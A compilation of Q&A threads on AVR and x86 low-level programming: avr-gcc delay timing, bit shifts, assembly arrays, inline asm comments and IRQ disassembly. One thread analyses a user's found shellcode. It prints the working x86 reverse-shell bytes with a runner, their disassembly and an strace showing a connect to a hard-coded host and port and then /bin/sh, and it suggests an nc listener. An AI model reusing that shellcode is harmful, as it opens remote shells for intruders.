_delay_us(); timing explanation - c

I made a program with atmega16 and was trying to make my own delay_us() so I looked into the compiler avr-gcc library for _delay_us() function and this is its code:
static inline void _delay_us(double __us) __attribute__((always_inline));
/*
\ingroup util_delay
Perform a delay of \c __us microseconds, using _delay_loop_1().
The macro F_CPU is supposed to be defined to a
constant defining the CPU clock frequency (in Hertz).
The maximal possible delay is 768 us / F_CPU in MHz.
If the user requests a delay greater than the maximal possible one,
_delay_us() will automatically call _delay_ms() instead. The user
will not be informed about this case.
*/
void
_delay_us(double __us)
{
uint8_t __ticks;
double __tmp = ((F_CPU) / 3e6) * __us; //number of ticks per us * delay time in us
if (__tmp < 1.0)
__ticks = 1;
else if (__tmp > 255)
{
_delay_ms(__us / 1000.0);
return;
}
else
__ticks = (uint8_t)__tmp;
_delay_loop_1(__ticks); // function decrements ticks untill it reaches 0( takes 3 cycles)
}
I got confused about how, if I use a 1Mhz clock, this function that contains floating point arithmetic will be able to make small delays (like _delay_us(10)), because executing all the the setup code will definitely take more time than that. So I wrote this program:
#include <avr/io.h>
#include <avr/interrupt.h>
#include <util/delay.h>
#define F_CPU 1000000UL
int main()
{
_delay_ms(1000);
DDRB=0XFF;
PORTB=0XFF;
_delay_us(10);
PORTB=0;
for(;;){}
return 0;
}
I simulated it using protues and used an oscilloscope and connected one of PORTB pins to its input. Then I saw that the delay was exactly 10 us. How could the delay be that accurate considering this set up code statement that uses floating point arithmetic:
double __tmp = ((F_CPU) / 4e3) * __ms;
This should have taken a lot of cycles that makes _delay_us(10) exceed the 10 us period, but the time was exactly 10us!!

All the floating point arithmetic is calculated by the preprocessor as these delay functions are actually macros. So at the point the mcu executes the code, all that's left is a loop that uses an integer to do the delay.

typedef unsigned char uint8_t;
#define F_CPU 16000000
extern void _delay_loop_1( uint8_t );
static void _delay_us(double __us)
{
uint8_t __ticks;
double __tmp = ((F_CPU) / 3e6) * __us;
if (__tmp < 1.0)
{
__ticks = 1;
}
else
{
if (__tmp > 255)
{
_delay_ms(__us / 1000.0);
return;
}
else
{
__ticks = (uint8_t)__tmp;
}
}
_delay_loop_1(__ticks);
}
void fun1 ( void )
{
_delay_us(10);
}
which with gcc can produce this:
00000000 <fun1>:
0: 85 e3 ldi r24, 0x35 ; 53
2: 00 c0 rjmp .+0 ; 0x4 <__zero_reg__+0x3>
the number to feed _delay_loop_1 is computed at compile time not runtime, all of that dead code goes away.
but add this:
void fun2 ( void )
{
uint8_t ra;
for(ra=1;ra<10;ra++) _delay_us(ra);
}
and things change dramatically.
00000000 <fun1>:
0: 85 e3 ldi r24, 0x35 ; 53
2: 00 c0 rjmp .+0 ; 0x4 <fun2>
00000004 <fun2>:
4: 8f 92 push r8
6: 9f 92 push r9
8: af 92 push r10
a: bf 92 push r11
c: cf 92 push r12
e: df 92 push r13
10: ef 92 push r14
12: ff 92 push r15
14: cf 93 push r28
16: c1 e0 ldi r28, 0x01 ; 1
18: 6c 2f mov r22, r28
1a: 70 e0 ldi r23, 0x00 ; 0
1c: 80 e0 ldi r24, 0x00 ; 0
1e: 90 e0 ldi r25, 0x00 ; 0
20: 00 d0 rcall .+0 ; 0x22 <fun2+0x1e>
22: 86 2e mov r8, r22
24: 97 2e mov r9, r23
26: a8 2e mov r10, r24
28: b9 2e mov r11, r25
2a: 2b ea ldi r18, 0xAB ; 171
2c: 3a ea ldi r19, 0xAA ; 170
2e: 4a ea ldi r20, 0xAA ; 170
30: 50 e4 ldi r21, 0x40 ; 64
32: 00 d0 rcall .+0 ; 0x34 <fun2+0x30>
34: c6 2e mov r12, r22
36: d7 2e mov r13, r23
38: e8 2e mov r14, r24
3a: f9 2e mov r15, r25
3c: 20 e0 ldi r18, 0x00 ; 0
3e: 30 e0 ldi r19, 0x00 ; 0
40: 40 e8 ldi r20, 0x80 ; 128
42: 5f e3 ldi r21, 0x3F ; 63
44: 00 d0 rcall .+0 ; 0x46 <fun2+0x42>
46: 87 fd sbrc r24, 7
48: 00 c0 rjmp .+0 ; 0x4a <fun2+0x46>
4a: 20 e0 ldi r18, 0x00 ; 0
4c: 30 e0 ldi r19, 0x00 ; 0
4e: 4f e7 ldi r20, 0x7F ; 127
50: 53 e4 ldi r21, 0x43 ; 67
52: 9f 2d mov r25, r15
54: 8e 2d mov r24, r14
56: 7d 2d mov r23, r13
58: 6c 2d mov r22, r12
5a: 00 d0 rcall .+0 ; 0x5c <fun2+0x58>
5c: 18 16 cp r1, r24
5e: 04 f0 brlt .+0 ; 0x60 <fun2+0x5c>
60: 9f 2d mov r25, r15
62: 8e 2d mov r24, r14
64: 7d 2d mov r23, r13
66: 6c 2d mov r22, r12
68: 00 d0 rcall .+0 ; 0x6a <fun2+0x66>
6a: 86 2f mov r24, r22
6c: 00 d0 rcall .+0 ; 0x6e <fun2+0x6a>
6e: cf 5f subi r28, 0xFF ; 255
70: ca 30 cpi r28, 0x0A ; 10
72: 01 f4 brne .+0 ; 0x74 <fun2+0x70>
74: cf 91 pop r28
76: ff 90 pop r15
78: ef 90 pop r14
7a: df 90 pop r13
7c: cf 90 pop r12
7e: bf 90 pop r11
80: af 90 pop r10
82: 9f 90 pop r9
84: 8f 90 pop r8
86: 08 95 ret
88: 20 e0 ldi r18, 0x00 ; 0
8a: 30 e0 ldi r19, 0x00 ; 0
8c: 4a e7 ldi r20, 0x7A ; 122
8e: 54 e4 ldi r21, 0x44 ; 68
90: 9b 2d mov r25, r11
92: 8a 2d mov r24, r10
94: 79 2d mov r23, r9
96: 68 2d mov r22, r8
98: 00 d0 rcall .+0 ; 0x9a <fun2+0x96>
9a: 00 d0 rcall .+0 ; 0x9c <fun2+0x98>
9c: 00 c0 rjmp .+0 ; 0x9e <fun2+0x9a>
9e: 81 e0 ldi r24, 0x01 ; 1
a0: 00 c0 rjmp .+0 ; 0xa2 <__SREG__+0x63>
hmm, how good is the optimizer?
void fun3 ( void )
{
uint8_t ra;
for(ra=20;ra<22;ra++) _delay_us(ra);
}
thought so
00000004 <fun3>:
4: 8a e6 ldi r24, 0x6A ; 106
6: 00 d0 rcall .+0 ; 0x8 <fun3+0x4>
8: 80 e7 ldi r24, 0x70 ; 112
a: 00 c0 rjmp .+0 ; 0xc <fun3+0x8>
figured the count to 10 would have done it.
A lot of times you will see delay loop functions like this get used with hardcoded values because the spec for whatever you are bit banging, etc has those values and it is easy when the thing says pop reset then wait 100us, you just call a delay with 100 in it. Now if there is one file with:
fun4(10);
and another file (another optimization domain) you have the above with this added:
void fun4 ( uint8_t x)
{
_delay_us(x);
}
you can then understand where this is headed...runtime...dont even need to compile it to see that it will have the problem. Now some compilers like llvm you can optimize across file domains, but they dont target the AVR, their MSP430 was a publicity stunt more than reality as it doesnt work and is not supported. Their arm support is obviously good, but they change their command line options pretty much every minor release, I have long since gotten tired trying to use them as I have to constantly change my makefiles to keep up, and their optimized code is sadly as not as fast as gccs despite gccs code getting worse every release and llvm getting a little better (worse/better are in the eyes of the beholder of course).

Related

What does this shellcode mean?

I've found an interesting code and run it, and I wonder what this code does.
I'm worried if this code harms my computer
#include <stdio.h>
/*
ipaddr 192.168.1.10 (c0a8010a)
port 31337 (7a69)
*/
#define IPADDR "\xc0\xa8\x01\x0a"
#define PORT "\x7a\x69"
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR"\x66\x68"PORT"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}
I don't know about shellcode
First, you should disassemble the code, for example by modifying the source to
#include <stdio.h>
/*
ipaddr 192.168.1.10 (c0a8010a)
port 31337 (7a69)
*/
#define IPADDR "\xc0\xa8\x01\x0a"
#define PORT "\x7a\x69"
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR"\x66\x68"PORT"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80";
main()
{
write(1, code, sizeof(code)-1);
}
$ gcc -O2 sc.c -o sc
$ ./sc > sc.bin
Now, you can use objdump to get the disassembled source (isa is obviously ia32):
$ objdump -bbinary -mi386 -D sc.bin
Disassembly of section .data:
00000000 <.data>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 31 d2 xor %edx,%edx
8: b0 66 mov $0x66,%al
a: b3 01 mov $0x1,%bl
c: 51 push %ecx
d: 6a 06 push $0x6
f: 6a 01 push $0x1
11: 6a 02 push $0x2
13: 89 e1 mov %esp,%ecx
15: cd 80 int $0x80
17: 89 c6 mov %eax,%esi
19: b0 66 mov $0x66,%al
1b: 31 db xor %ebx,%ebx
1d: b3 02 mov $0x2,%bl
1f: 68 c0 a8 01 0a push $0xa01a8c0
24: 66 68 7a 69 pushw $0x697a
28: 66 53 push %bx
2a: fe c3 inc %bl
2c: 89 e1 mov %esp,%ecx
2e: 6a 10 push $0x10
30: 51 push %ecx
31: 56 push %esi
32: 89 e1 mov %esp,%ecx
34: cd 80 int $0x80
36: 31 c9 xor %ecx,%ecx
38: b1 03 mov $0x3,%cl
3a: fe c9 dec %cl
3c: b0 3f mov $0x3f,%al
3e: cd 80 int $0x80
40: 75 f8 jne 0x3a
42: 31 c0 xor %eax,%eax
44: 52 push %edx
45: 68 6e 2f 73 68 push $0x68732f6e
4a: 68 2f 2f 62 69 push $0x69622f2f
4f: 89 e3 mov %esp,%ebx
51: 52 push %edx
52: 53 push %ebx
53: 89 e1 mov %esp,%ecx
55: 52 push %edx
56: 89 e2 mov %esp,%edx
58: b0 0b mov $0xb,%al
5a: cd 80 int $0x80
Now you can start disassembling. Most important are the syscalls (int $0x80); the syscall numbers are in register %eax (you can see, which syscall it is, in the includefile asm/unistd_32.h), the parameters are in other registers.
The more dangerous (and less reliable), but easier and faster way:
You can create some kind of sandbox (for example, a chrooted, unprivileged user on a unix system, or even better, a vm) and run the code with "strace" to get an idea, what it does. However, this might be less reliable, since you cannot know for sure, if you see a relevant codepath then due to the circumstances or anti-debugging techniques.
This shellcode is bind port shellcode through this address 192.168.1.10. This is commonly used for remote exploit
write(1, "Shellcode Length: 92\n", 21Shellcode Length: 92
) = 21
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(31337), sin_addr=inet_addr("192.168.1.10")}, 16
In other terminal, if correct you can use command like nc 192.168.1.10 31337
Of course if you aware with this shellcode, you can do static analysis (like disassemble) every bytes of shellcode.

Bitwise shift of an array of chars in AVR C

Initially I need to send and receive serially some data. The packet length is 48 bits.
For shorter packets (32 bits) I could do something like that:
unsigned long data=0x12345678;
for(i=0;i<32;i++){
if(data & 0x80000000)
setb_MOD;
else
clrb_MOD;
data <<= 1;
}
This code compilation is really pleasing me:
code<<=1;
ac: 88 0f add r24, r24
ae: 99 1f adc r25, r25
b0: aa 1f adc r26, r26
b2: bb 1f adc r27, r27
b4: 80 93 63 00 sts 0x0063, r24
b8: 90 93 64 00 sts 0x0064, r25
bc: a0 93 65 00 sts 0x0065, r26
c0: b0 93 66 00 sts 0x0066, r27
After I needed to extend the packet (to 48 bits) I faced with the need to shift an array:
unsigned char data[6]={0x12,0x34,0x56,0x78,0xAB,0xCD};
for(i=0;i<48;i++){
if(data[5] & 0x80)
setb_MOD;
else
clrb_MOD;
for(j=5;j>0;j--){
data[j]<<=1;
if(data[j-1] & 0x80)
data[j]+=1;
}
data[0] <<= 1;
}
The compilled code is slightly depends on an optimization settings but generally it is doing what I commanded in C:
for(j=5;j>0;j--){
code[j]<<=1;
a8: 82 91 ld r24, -Z
aa: 88 0f add r24, r24
ac: 80 83 st Z, r24
if(code[j-1]&0x80)
ae: 9e 91 ld r25, -X
b0: 97 fd sbrc r25, 7
b2: 13 c0 rjmp .+38 ; 0xda <__vector_2+0x74>
clrb_MOD;
}
else{
setb_MOD;
}
for(j=5;j>0;j--){
b4: 80 e0 ldi r24, 0x00 ; 0
b6: a3 36 cpi r26, 0x63 ; 99
b8: b8 07 cpc r27, r24
ba: b1 f7 brne .-20 ; 0xa8 <__vector_2+0x42>
code[j]<<=1;
if(code[j-1]&0x80)
code[j]+=1;
}
As you can see there is no obvious (for a human) solution to shift an array byte after byte.
I'd like to skip injection of inline assembler as I don't really manage this technique and I don't really understand how do I address C variables in Asm. Is there any alternatives?
If you know your input is less than 64 bits, you can do something like (assuming stdint.h is available, otherwise convert to unsigned long long, etc):
union BitShifter
{
uint64_t u64;
uint32_t u32[2];
uint16_t u16[4];
uint8_t u8[8];
};
union BitShifter MyBitshifter;
MyBitShifter.u64 <<= 1;
The compiler should use the best instruction to accomplish that (probably two 32 bit shifts and some other logic to get the bit from one word to another. Of course, the backend might be lazy and do it as bytes...
Depending on the endianness of the AVR, you'll have to swizzle your bytes in the right order to the outgoing bit order correct.

Creation and addressing arrays in AVR Assembly (Using the ATMega8535)

I am having trouble with the creation and addressing of an array created purely in assembly using the instruction set for the Atmel ATMega8535.
What I understand so far is as follows:
The array contains contiguous data that is equal in length.
The creation of the array involves defining the beginning and end locations of the array (much like you would the stack).
You would address an index in the array by adding an offset of the base address of the array.
What I am looking to do specifically is create a 1-D array of 8-bit integers with predefined values populating it during initialization it does not have to be written to, only addressed when needed. The problem ultimately lying in not being able to translate the logic into the assembly code.
I have tried with little progress to do so using support from the following books:
Some Assembly Required: Assembly Language Programming with the AVR Microcontroller by Timothy S Margush
Get Going with...AVR Microcontrollers by Peter Sharpe
Any help, advice or further resources would be greatly appreciated.
If your array is read-only, you do not need to copy it to RAM. You can
keep it in Flash and read it from there when needed. This will save you
precious RAM, at the cost of slower access (read from RAM is 2 cycles,
read from flash is 3 cycles).
You can declare your array like this:
.global my_array
.type my_array, #object
my_array:
.byte 12, 34, 56, 78
Then, to read a member of the array, you have to compute:
adress of member = array base address + member index
If your members were more than one byte, you would have to also multiply
the index by the size, but this is not the case here. Then, you put the
address of the required member in the Z register and issue an lpm
instruction. Here is a function implementing this logic:
.global read_data
; input: r24 = array index, r1 = 0
; output: r24 = array value
; clobbers: r30, r31
read_data:
ldi r30, lo8(my_array) ; load Z = address of my_array
ldi r31, hi8(my_array) ; ...high byte also
add r30, r24 ; add the array index
adc r31, r1 ; ...and add 0 to propagate the carry
lpm r24, Z
ret
#scottt advised you to first write in C, then look at the generated
assembly. I consider this very good advice, let's follow it:
#include <stdint.h>
__flash const uint8_t my_array[] = {12, 34, 56, 78};
uint8_t read_data(uint8_t index)
{
return my_array[index];
}
The __flash keyword identifying a “named address space” is an embedded
C extension supported by
gcc. The
generated assembly is slightly different from the previous one: instead
of computing base_address + index, gcc does index − (−base_address):
read_data:
mov r30, r24 ; load Z = array index
ldi r31, 0 ; ...high byte of index is 0
subi r30, lo8(-(my_array)) ; subtract -(address of my array)
sbci r31, hi8(-(my_array)) ; ...high byte also
lpm r24, Z
ret
This is just as efficient as the previous hand-rolled assembly, except
that it does not need the r1 register to be initialized to zero. But
keeping r1 to zero is part of the gcc ABI anyway, so it should make no
difference.
The role of the linker
This section is meant to answer the question in the comment: how can we
access the array if we do not know its address? The answer is: we access
it by its name, just like in the code snippets above. Choosing the final
address for the array, as well as replacing the name by the appropriate
address, is the linker’s job.
Assembling (with avr-gcc -c) and disassembling (with avr-objdump -d)
the first code snippet gives this:
my_array.o, section .text:
00000000 <my_array>:
0: 0c 22 38 4e ."8N
If we were compiling from C, gcc would have put the array in the
.progmem.data section instead of .text, but it makes little difference.
The numbers “0c 22 38 4e” are the array contents, in hex. The characters
to the right are the ASCII equivalents, ‘.’ being the placeholder for
non printing characters.
The object file also carries this symbol table, shown by avr-nm:
my_array.o:
00000000 T my_array
meaning the symbol “my_array” has been defined as referring to offset 0
into the .text section (implied by “T”) of this object.
Assembling and disassembling the second code snippet gives this:
read_data.o, section .text:
00000000 <read_data>:
0: e0 e0 ldi r30, 0x00
2: f0 e0 ldi r31, 0x00
4: e8 0f add r30, r24
6: f1 1d adc r31, r1
8: 84 91 lpm r24, Z
a: 08 95 ret
Comparing the disassembly with the actual source code, it can be seen
that the assembler replaced the address of my_array with 0x00, which is
almost guaranteed to be wrong. But it also left a note to the linker in
the form of “relocation records”, shown by avr-objdump -r:
read_data.o, RELOCATION RECORDS FOR [.text]:
OFFSET TYPE VALUE
00000000 R_AVR_LO8_LDI my_array
00000002 R_AVR_HI8_LDI my_array
This tells the linker that the ldi instructions at offsets 0x00 and
0x02 are intended to load the low byte and the high byte (respectively)
of the final address of my_array. The object file also carries this
symbol table:
read_data.o:
U my_array
00000000 T read_data
where the “U” line means the file makes use of an undefined symbol named
“my_array”.
Linking these pieces together, with a suitable main(), yields a binary
containing the C runtime from avr-lbc, together with our code:
0000003c <my_array>:
3c: 0c 22 38 4e ."8N
00000040 <read_data>:
40: ec e3 ldi r30, 0x3C
42: f0 e0 ldi r31, 0x00
44: e8 0f add r30, r24
46: f1 1d adc r31, r1
48: 84 91 lpm r24, Z
4a: 08 95 ret
It should be noted that, not only has the linker moved the pieces around
to their final addresses, it has also fixed the arguments of the ldi
instructions so that they now point to the correct address of my_array.
The code should look something like this:
.section .text
.global main
main:
ldi r30,lo8(data)
ldi r31,hi8(data)
ldd r24,Z+3
sts output,r24
ld r24,Z
sts output,r24
ldi r24,0
ldi r25,0
ret
.global data
.data
data:
.byte 1, 2, 3, 4
.comm output,1,1
Explanation
For people who have programmed in assembler using the GNU toolchain before, there are lessons that are transferable even to unfamiliar instruction sets:
You reserve space for an array with the assembler directives .byte 1, 2, 3, 4, .word 1, 2 (.word is 16 bits for AVR) or .space 100.
When learning a new instruction set, write C programs and ask the C compiler to generate assembler output. Find a good assembler programming reference for the instruction set as you read the assembler code.
Applying this trick below.
byte-array.c
/* volatile our code doesn't get optimized out even when compiler optimization is on */
volatile char output;
char data[] = { 1, 2, 3, 4 };
int main(void)
{
output = data[3];
output = data[0];
return 0;
}
Generate Assembler from C
avr-gcc -mmcu=atmega8 -Wall -Os -S byte-array.c
This will generate the assembler file byte-array.s.
byte-array.s
.file "byte-array.c"
__SP_H__ = 0x3e
__SP_L__ = 0x3d
__SREG__ = 0x3f
__tmp_reg__ = 0
__zero_reg__ = 1
.section .text.startup,"ax",#progbits
.global main
.type main, #function
main:
/* prologue: function */
/* frame size = 0 */
/* stack size = 0 */
.L__stack_usage = 0
ldi r30,lo8(data)
ldi r31,hi8(data)
ldd r24,Z+3
sts output,r24
ld r24,Z
sts output,r24
ldi r24,0
ldi r25,0
ret
.size main, .-main
.global data
.data
.type data, #object
.size data, 4
data:
.byte 1
.byte 2
.byte 3
.byte 4
.comm output,1,1
.ident "GCC: (Fedora 4.9.2-1.fc21) 4.9.2"
.global __do_copy_data
.global __do_clear_bss
Read this explanation of Pointer Registers to see how the AVR instruction set uses the r30, r31 register pair as the pointer register Z. Read up on the ld, st, ldi, ldd, sts and std instructions.
Implementation Notes
If you link the program then disassemble it:
avr-gcc -mmcu=atmega8 -Os byte-array.c -o byte-array.elf
avr-objdump -d byte-array.elf
00000000 <__vectors>:
0: 12 c0 rjmp .+36 ; 0x26 <__ctors_end>
2: 2c c0 rjmp .+88 ; 0x5c <__bad_interrupt>
4: 2b c0 rjmp .+86 ; 0x5c <__bad_interrupt>
6: 2a c0 rjmp .+84 ; 0x5c <__bad_interrupt>
8: 29 c0 rjmp .+82 ; 0x5c <__bad_interrupt>
a: 28 c0 rjmp .+80 ; 0x5c <__bad_interrupt>
c: 27 c0 rjmp .+78 ; 0x5c <__bad_interrupt>
e: 26 c0 rjmp .+76 ; 0x5c <__bad_interrupt>
10: 25 c0 rjmp .+74 ; 0x5c <__bad_interrupt>
12: 24 c0 rjmp .+72 ; 0x5c <__bad_interrupt>
14: 23 c0 rjmp .+70 ; 0x5c <__bad_interrupt>
16: 22 c0 rjmp .+68 ; 0x5c <__bad_interrupt>
18: 21 c0 rjmp .+66 ; 0x5c <__bad_interrupt>
1a: 20 c0 rjmp .+64 ; 0x5c <__bad_interrupt>
1c: 1f c0 rjmp .+62 ; 0x5c <__bad_interrupt>
1e: 1e c0 rjmp .+60 ; 0x5c <__bad_interrupt>
20: 1d c0 rjmp .+58 ; 0x5c <__bad_interrupt>
22: 1c c0 rjmp .+56 ; 0x5c <__bad_interrupt>
24: 1b c0 rjmp .+54 ; 0x5c <__bad_interrupt>
00000026 <__ctors_end>:
26: 11 24 eor r1, r1
28: 1f be out 0x3f, r1 ; 63
2a: cf e5 ldi r28, 0x5F ; 95
2c: d4 e0 ldi r29, 0x04 ; 4
2e: de bf out 0x3e, r29 ; 62
30: cd bf out 0x3d, r28 ; 61
00000032 <__do_copy_data>:
32: 10 e0 ldi r17, 0x00 ; 0
34: a0 e6 ldi r26, 0x60 ; 96
36: b0 e0 ldi r27, 0x00 ; 0
38: e4 e8 ldi r30, 0x84 ; 132
3a: f0 e0 ldi r31, 0x00 ; 0
3c: 02 c0 rjmp .+4 ; 0x42 <__SREG__+0x3>
3e: 05 90 lpm r0, Z+
40: 0d 92 st X+, r0
42: ac 36 cpi r26, 0x6C ; 108
44: b1 07 cpc r27, r17
46: d9 f7 brne .-10 ; 0x3e <__SP_H__>
00000048 <__do_clear_bss>:
48: 10 e0 ldi r17, 0x00 ; 0
4a: ac e6 ldi r26, 0x6C ; 108
4c: b0 e0 ldi r27, 0x00 ; 0
4e: 01 c0 rjmp .+2 ; 0x52 <.do_clear_bss_start>
00000050 <.do_clear_bss_loop>:
50: 1d 92 st X+, r1
00000052 <.do_clear_bss_start>:
52: ad 36 cpi r26, 0x6D ; 109
54: b1 07 cpc r27, r17
56: e1 f7 brne .-8 ; 0x50 <.do_clear_bss_loop>
58: 02 d0 rcall .+4 ; 0x5e <main>
5a: 12 c0 rjmp .+36 ; 0x80 <_exit>
0000005c <__bad_interrupt>:
5c: d1 cf rjmp .-94 ; 0x0 <__vectors>
0000005e <main>: ...
00000080 <_exit>:
80: f8 94 cli
00000082 <__stop_program>:
82: ff cf rjmp .-2 ; 0x82 <__stop_program>
You can see avr-gcc automatically generates startup code, including:
the interrupt vector (__vectors), which uses rjmp to jump to the Interrupt Service Routines.
initialize the status register, SREG , and the stack pointer, SPL/SPH (__ctors_end)
copies the data segment content from FLASH to RAM for initialized, writable global variables (__do_copy_data)
clears the BSS segment for uninitialized writable global variables (__do_clear_bss etc)
calls our main() function
calls _exit() if main() ever returns
_exit() is just a cli to disable interrupts
and an infinite loop (__stop_program)

How to add inline comments to generated assembly from arduino

I am trying to add inline comments to the generated assembly on my arduino. So for instance
/*
Testing
*/
#include <avr/io.h>
#include <iostream>
int ledPin = 13;
void setup()
{
asm volatile("\n# comment 1");
pinMode(ledPin, OUTPUT);
}
void loop()
{
asm volatile("\n# comment 2");
digitalWrite(ledPin, HIGH);
delay(1000);
digitalWrite(ledPin, LOW);
delay(1000);
}
when the assembly is generated for the code i want to see "comment 1" and "comment 2" as a marker at that particular line in the assembly code.
Here is the assembly generated code
C:\Users\****\AppData\Local\Temp\build1888832469367065438.tmp\sketch_jul17a.cpp.o: file format elf32-avr
Disassembly of section .text.loop:
00000000 <loop>:
loop():
C:\Program Files (x86)\Arduino/sketch_jul17a.ino:19
0: 80 91 00 00 lds r24, 0x0000
4: 61 e0 ldi r22, 0x01 ; 1
6: 0e 94 00 00 call 0 ; 0x0 <loop>
C:\Program Files (x86)\Arduino/sketch_jul17a.ino:20
a: 68 ee ldi r22, 0xE8 ; 232
c: 73 e0 ldi r23, 0x03 ; 3
e: 80 e0 ldi r24, 0x00 ; 0
10: 90 e0 ldi r25, 0x00 ; 0
12: 0e 94 00 00 call 0 ; 0x0 <loop>
C:\Program Files (x86)\Arduino/sketch_jul17a.ino:21
16: 80 91 00 00 lds r24, 0x0000
1a: 60 e0 ldi r22, 0x00 ; 0
1c: 0e 94 00 00 call 0 ; 0x0 <loop>
C:\Program Files (x86)\Arduino/sketch_jul17a.ino:22
20: 68 ee ldi r22, 0xE8 ; 232
22: 73 e0 ldi r23, 0x03 ; 3
24: 80 e0 ldi r24, 0x00 ; 0
26: 90 e0 ldi r25, 0x00 ; 0
28: 0e 94 00 00 call 0 ; 0x0 <loop>
C:\Program Files (x86)\Arduino/sketch_jul17a.ino:23
2c: 08 95 ret
Disassembly of section .text.setup:
00000000 <setup>:
setup():
C:\Program Files (x86)\Arduino/sketch_jul17a.ino:13
0: 80 91 00 00 lds r24, 0x0000
4: 61 e0 ldi r22, 0x01 ; 1
6: 0e 94 00 00 call 0 ; 0x0 <setup>
C:\Program Files (x86)\Arduino/sketch_jul17a.ino:14
a: 08 95 ret
The comments are not included in the assembly code, how can I do this
First of all comments in "regular" (not cpp pre-processed) assembler code begin with a hash sign, not with two slashes. So you might want that a comment named "# onesectimer" is in the assembler code.
This may be archieved the following way:
asm("\n# onesectimer");
void OneSecTimer()
{
if(bags!=0){
asm("\n# for counter 1");
if(counter1 == 3)
...
--- Edit ---
Reading your comments and your edits I think you are mixing the words "assembly" and "disassembly":
When translating C code to binary code the C compiler generates "assembly" code. This code may contain comments:
# This is a comment
lds r24, 0
ldi r22, 1
call digitalWrite
The assembler then translates this "assembly" code to binary code. In binary code there is no information about comments any more but only the binary data to be written to the memory.
The "disassembly" translates the binary data back to assembly code but only information that is present in binary code may be disassembled - so you cannot have any comments in disassembly code!
What you may do is to insert a symbol into the object file at a point of interest:
digitalWrite(0,1);
asm volatile(".global Here_is_Delay\nHere_is_Delay:");
delay(1000);
The names of these symbols must be unique over the whole project and not be identical to any function or variable name used.
Depending on the disassembler (not sure about the AVR one) you'll see the symbols then:
loop():
C:\Program Files (x86)\Arduino/sketch_jul17a.ino:19
0: 80 91 00 00 lds r24, 0x0000
4: 61 e0 ldi r22, 0x01 ; 1
6: 0e 94 00 00 call 0 ; 0x0 <loop>
Here_is_Delay():
C:\Program Files (x86)\Arduino/sketch_jul17a.ino:20
a: 68 ee ldi r22, 0xE8 ; 232
c: 73 e0 ldi r23, 0x03 ; 3
...

analyzing i386 assembled function... line by line

hi i'm such newb in assemble and OS world. and yes this is my homework which i'm in stuck in deep dark of i386 manual. please help me or give me some hint.. here's code i have to analyze ine by line. this function is part of EOS(educational OS), doing about interrupt request in hal(hardware abstraction layer). i did "objdump -d interrupt.o" and got this assemble code. of course in i386.
00000000 <eos_ack_irq>:
0: 55 push %ebp ; push %ebp to stack to save stack before
1: b8 fe ff ff ff mov $0xfffffffe,%eax ; what is this??
6: 89 e5 mov %esp,%ebp ; couple with "push %ebp". known as prolog assembly function.
8: 8b 4d 08 mov 0x8(%ebp),%ecx ; set %ecx as value of (%ebp+8)...and what is this do??
b: 5d pop %ebp ; pop the top of stack to %ebp. i know this is for getting back to callee..
c: d3 c0 rol %cl,%eax ; ????? what is this for???
e: 21 05 00 00 00 00 and %eax,0x0 ; make %eax as 0. for what??
14: c3 ret ; return what register??
00000015 <eos_get_irq>:
15: 8b 15 00 00 00 00 mov 0x0,%edx
1b: b8 1f 00 00 00 mov $0x1f,%eax
20: 55 push %ebp
21: 89 e5 mov %esp,%ebp
23: 56 push %esi
24: 53 push %ebx
25: bb 01 00 00 00 mov $0x1,%ebx
2a: 89 de mov %ebx,%esi
2c: 88 c1 mov %al,%cl
2e: d3 e6 shl %cl,%esi
30: 85 d6 test %edx,%esi
32: 75 06 jne 3a <eos_get_irq+0x25>
34: 48 dec %eax
35: 83 f8 ff cmp $0xffffffff,%eax
38: 75 f0 jne 2a <eos_get_irq+0x15>
3a: 5b pop %ebx
3b: 5e pop %esi
3c: 5d pop %ebp
3d: c3 ret
0000003e <eos_disable_irq_line>:
3e: 55 push %ebp
3f: b8 01 00 00 00 mov $0x1,%eax
44: 89 e5 mov %esp,%ebp
46: 8b 4d 08 mov 0x8(%ebp),%ecx
49: 5d pop %ebp
4a: d3 e0 shl %cl,%eax
4c: 09 05 00 00 00 00 or %eax,0x0
52: c3 ret
00000053 <eos_enable_irq_line>:
53: 55 push %ebp
54: b8 fe ff ff ff mov $0xfffffffe,%eax
59: 89 e5 mov %esp,%ebp
5b: 8b 4d 08 mov 0x8(%ebp),%ecx
5e: 5d pop %ebp
5f: d3 c0 rol %cl,%eax
61: 21 05 00 00 00 00 and %eax,0x0
67: c3 ret
and here's pre-assembled C code
/* ack the specified irq */
void eos_ack_irq(int32u_t irq) {
/* clear the corresponding bit in _irq_pending register */
_irq_pending &= ~(0x1<<irq);
}
/* get the irq number */
int32s_t eos_get_irq() {
/* get the highest bit position in the _irq_pending register */
int i = 31;
for(; i>=0; i--) {
if (_irq_pending & (0x1<<i)) {
return i;
}
}
return -1;
}
/* mask an irq */
void eos_disable_irq_line(int32u_t irq) {
/* turn on the corresponding bit */
_irq_mask |= (0x1<<irq);
}
/* unmask an irq */
